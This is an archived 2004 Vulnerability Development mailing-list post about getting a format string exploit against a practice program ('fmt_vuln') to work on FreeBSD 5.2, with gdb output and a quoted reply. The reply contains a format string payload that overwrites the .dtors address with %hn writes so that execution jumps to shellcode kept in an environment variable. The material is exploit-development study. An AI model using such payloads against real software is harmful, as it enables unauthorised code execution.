Vulnerability Development mailing list archives

Re: Problem with format string exploit dev in FreeBSD 5.2-CURRENT


From: Ganbold <ganbold () micom mng net>
Date: Mon, 02 Aug 2004 11:37:54 +0900

Thank you for quick answer.

However when I try to get EGG in gdb I get:

bash-2.05b$ uname -msr
FreeBSD 5.2-CURRENT i386

bash-2.05b$ nm fmt_vuln | grep __DTOR_END__
08049828 d __DTOR_END__

bash-2.05b$ ./getenvaddr EGG
EGG is located at 0xbfbfe557

bash-2.05b$ gdb -q ./fmt_vuln
(no debugging symbols found)...(gdb)
(gdb) x/1s 0xbfbfe557
0xbfbfe557:      <Address 0xbfbfe557 out of bounds>
(gdb)

What should I do in this case? Why it says "Address out of bounds"?

Ganbold


At 09:24 AM 31.07.2004, you wrote:
-bash-2.05b$ uname -msr
FreeBSD 5.2.1-RC2 i386
-bash-2.05b$ gcc -o fmt_vuln fmt_vuln.c
-bash-2.05b$ nm fmt_vuln | grep __DTOR_END__
08049848 d __DTOR_END__
-bash-2.05b$ gdb -q ./fmt_vuln
(no debugging symbols found)...(gdb)
(gdb) x/1s 0xbfbfedf5
0xbfbfedf5:      "EGG=vlad902"
(gdb) b * 0xbfbfedf9
Breakpoint 1 at 0xbfbfedf9
(gdb) run `perl -e 'print
"\x4a\x98\x04\x08\xff\xff\xff\xff\xee\xee\xee\xee\x48\x98\x04\x08" .
"%.49045u%.8x%.8x%.8x.%x%hn%x%.11826u%hn%x"'`
..
[*] test_val @ 0x0804979c = -72 0xffffffb8
(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0xbfbfedf9 in ?? ()


> Can somebody give me some hints, advices and guides?
Only advice I can give you is do it by hand rather then having tools
do it for you. Although while exploiting it beware, I found the stack
is very quirky which is why I seem to have so many useless %x s'
lieing around

  -vlad902


Current thread: